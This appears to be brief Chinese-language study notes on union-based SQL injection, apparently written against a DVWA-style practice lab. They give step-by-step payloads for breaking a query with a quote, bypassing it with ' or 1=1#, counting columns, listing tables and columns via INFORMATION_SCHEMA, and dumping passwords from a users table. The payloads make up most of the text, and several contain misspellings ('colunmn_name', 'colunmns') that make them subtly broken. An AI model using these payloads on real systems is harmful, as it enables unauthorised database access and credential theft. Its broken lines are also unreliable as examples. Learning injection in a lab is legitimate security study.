1.简单的SQL注入(select colunmns from table where criteria='')
在搜索框中输入 ' 然后单击,查看SQL错误信息,如果返回错误信息说明出现未匹配的单引号,结构破坏
输入:' or 1=1#'(数据库的注释方式很多包括--。#。//)
2.查询列表中有多少列
' union select null #' 合并一列
'union select null,null #' 合并两列 直到合并查询出列数
3.查询表明(数据库有一个特殊对象INFORMATION_SCHEMA,这个对象包含了每张表的名称,字段,元素)
'union select null,table_name from INFORMATION_SCHEMA.tables#'
4,查询表字段名称
'union select null,colunmn_name from INFORMATION_SCHEMA.colunmns where table_name='users '#'
5,查询重要字段名称数据
'union select null,password from users#' 根据得到的字段名称和表名称,可以查询出数据
6,把查询出的数据和用户列表进行交叉使用
'union select password,concat(first_name,'',last_name,'',user) from users